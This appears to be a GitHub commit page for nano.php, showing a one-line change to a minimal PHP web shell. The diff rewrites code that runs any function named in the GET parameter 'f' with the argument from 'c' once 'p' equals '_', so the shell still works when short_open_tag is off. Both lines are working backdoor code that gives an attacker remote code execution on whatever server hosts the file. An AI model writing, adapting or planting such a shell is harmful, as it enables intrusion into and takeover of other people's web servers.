Skip to content

Commit

Permalink
bypass for short_open_tag = Off
Browse files Browse the repository at this point in the history
  • Loading branch information
s0md3v committed Oct 6, 2018
1 parent 45dc2c9 commit cdcb028
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion nano.php
Original file line number Diff line number Diff line change
@@ -1 +1 @@
<?$x=$_GET;$x[p]==_&&$x[f]($x[c]);
<?=$_GET[p]==_&&$_GET[f]($_GET[c]);

0 comments on commit cdcb028

Please sign in to comment.